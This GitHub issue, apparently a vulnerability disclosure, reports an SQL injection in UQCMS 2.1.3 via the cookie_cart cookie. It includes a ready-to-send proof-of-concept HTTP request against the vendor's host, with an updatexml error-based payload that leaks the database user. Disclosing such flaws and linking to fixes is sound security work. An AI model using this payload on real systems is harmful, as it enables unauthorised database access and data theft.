Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

UQCMS SQL injection vulnerability #3

Open
alixiaowei opened this issue Nov 8, 2019 · 0 comments
Open

UQCMS SQL injection vulnerability #3

alixiaowei opened this issue Nov 8, 2019 · 0 comments

Comments

@alixiaowei
Copy link
Owner

Product Home: http://www.uqcms.com/
demo page: https://b2b2c.uqcms.com/
version: 2.1.3

Vulnerability file: home\controls\cart.class.php

home\controls\cart.class.php The code constructs a SQL query by input from untrusted sources, looks at the code context, finds that the code constructs a new SQL query by querying the results from the database. With this call cookie_cart parameters, an attacker can modify the meaning of instructions or execute arbitrary SQL commands if he can control the contents of the database.

POC:

GET /index.php/cart/num HTTP/1.1
Host: www.uqcms.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: UQCMSID=i47l4c8tstj2a8250nsca7gat6; cookie_cart=2019110822335887121' = updatexml(1,concat(0x7e,user(),0x7e),1) --+

8 1
8 2

How to fix:https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant